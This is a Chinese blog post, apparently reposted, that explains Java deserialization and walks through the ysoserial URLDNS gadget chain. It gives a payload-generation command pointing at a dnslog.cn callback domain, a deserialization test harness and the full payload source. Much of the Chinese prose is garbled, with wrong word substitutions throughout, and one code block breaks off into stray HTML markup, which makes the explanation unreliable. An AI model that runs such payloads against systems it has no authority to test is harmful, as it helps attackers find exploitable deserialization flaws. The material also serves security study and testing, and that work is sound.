|
<
序言
参考phith0n的Java宁静闲谈
Java的反序列化战PHP的反序列化实在有面相似,他们皆只能将一个工具中的属性根据某种特定的格局生成一段数据流,正在反序列化的时分再根据那个格局将属性拿返来,再赋值给新的工具。
但Java相对PHP序列化更深化的处所正在于,其供给了愈加初级、灵敏处所法 writeObject ,许可开辟者正在序列化流中插进一些自界说数据,进而正在反序列化的时分能够利用 readObject 停止读与。
固然,PHP中也供给了一个魔术办法叫 __wakeup ,正在反序列化的时分停止触收。许多人会以为Java的readObject 战PHP的 __wakeup 相似,但实在没有齐对,当然皆是正在反序列化的时分触收,但他们打点的成绩细微有些差别。
Java方案 readObject 的思路战PHP的 __wakeup 差别面正在于: readObject 偏向于打点“反序列化时怎样复原一个完好工具”那个成绩,而PHP的 __wakeup 更偏向于打点“反序列化后怎样初初化那个工具”的成绩。
实在,PHP的反序列化缺点,很少是由 __wakeup 那个办法触收的,凡是触收正在析构函数__destruct 里。实在年夜部分PHP反序列化缺点,皆并非由反序列化招致的,只是经由过程反序列化能够掌握工具的属性,进而正在后绝的代码中停止损伤操纵。
URLDNS
先从最简朴的URLDNS操纵链开端,东西睹github,号令以下:
- java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS "http://zeha2q.dnslog.cn" >urldns.bin
复造代码 考证代码
- package yso;
- import java.io.FileInputStream;
- import java.io.ObjectInputStream;
- public class URLDNS {
- public static void main(String[] args) throws Exception {
- ObjectInputStream ois = new ObjectInputStream(new FileInputStream("urldns.bin"));
- ois.readObject();
- }
- }
复造代码 结果
能够先看看ysoserial的URLDNS
- package ysoserial.payloads;
- import java.io.IOException;
- import java.net.InetAddress;
- import java.net.URLConnection;
- import java.net.URLStreamHandler;
- import java.util.HashMap;
- import java.net.URL;
- import ysoserial.payloads.annotation.Authors;
- import ysoserial.payloads.annotation.Dependencies;
- import ysoserial.payloads.annotation.PayloadTest;
- import ysoserial.payloads.util.PayloadRunner;
- import ysoserial.payloads.util.Reflections;
- /**
- * A blog post with more details about this gadget chain is at the url below:
- * https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/
- *
- * This was inspired by Philippe Arteau @h3xstream, who wrote a blog
- * posting describing how he modified the Java Commons Collections gadget
- * in ysoserial to open a URL. This takes the same idea, but eliminates
- * the dependency on Commons Collections and does a DNS lookup with just
- * standard JDK classes.
- *
- * The Java URL class has an interesting property on its equals and
- * hashCode methods. The URL class will, as a side effect, do a DNS lookup
- * during a comparison (either equals or hashCode).
- *
- * As part of deserialization, HashMap calls hashCode on each key that it
- * deserializes, so using a Java URL object as a serialized key allows
- * it to trigger a DNS lookup.
- *
- * Gadget Chain:
- * HashMap.readObject()
- * HashMap.putVal()
- * HashMap.hash()
- * URL.hashCode()
- *
- *
- */
- @SuppressWarnings({ "rawtypes", "unchecked" })
- @PayloadTest(skip = "true")
- @Dependencies()
- @Authors({ Authors.GEBL })
- public class URLDNS implements ObjectPayload<Object> {
- public Object getObject(final String url) throws Exception {
- //Avoid DNS resolution during payload creation
- //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
- URLStreamHandler handler = new SilentURLStreamHandler();
- HashMap ht = new HashMap(); // HashMap that will contain the URL
- URL u = new URL(null, url, handler); // URL to use as the Key
- ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
- Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
- return ht;
- }
- public static void main(final String[] args) throws Exception {
- PayloadRunner.run(URLDNS.class, args);
- }
- /**
- * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
- * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
- * using the serialized object.</p>
- *
- * <b>Potential false negative:</b>
- * <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
- * second resolution.</p>
- */
- static class SilentURLStreamHandler extends URLStreamHandler {
- protected URLConnection openConnection(URL u) throws IOException {
- return null;
- }
- protected synchronized InetAddress getHostAddress(URL u) {
- return null;
- }
- }
- }
复造代码 正文很具体,整体便是机关了一个歹意的被序列化的工具HashMap。此中,ysoserial为了防⽌正在⽣成Payload的时分也执⾏了URL恳求战DNS查询,重写了⼀个 SilentURLStreamHandler 类,那没有是必需的。
为什么挑选HashMap,年夜大都反序列化缺点触收皆是因为挪用了readobject,我们先去看看HashMap的readobject有甚么:
[code]private void readObject(java.io.ObjectInputStream s) throws IOException, ClassNotFoundException { // Read in the threshold (ignored), loadfactor, and any hidden stuff s.defaultReadObject(); reinitialize(); if (loadFactor <span class="token operator">readObject()HashMap->hash()
URL->hashCode()
URLStreamHandler->hashCode()
URLStreamHandler->getHostAddress()
InetAddress->getByName()
</ol> 整体上来说,该操纵链先需求初初化⼀个 java.net.URL 工具,做为 java.util.HashMap的key值,value值能够随便;接着,设置那 java.net.URL 工具的 hashCode 的初初值为 -1 ,以便反序列化时从头计较其 hashCode ,触收后⾯的DNS恳求。
参考:
phith0n的Java宁静闲谈
免责声明:假如进犯了您的权益,请联络站少,我们会实时删除侵权内乱容,感谢协作! |
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请发帖留言提供原创证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
|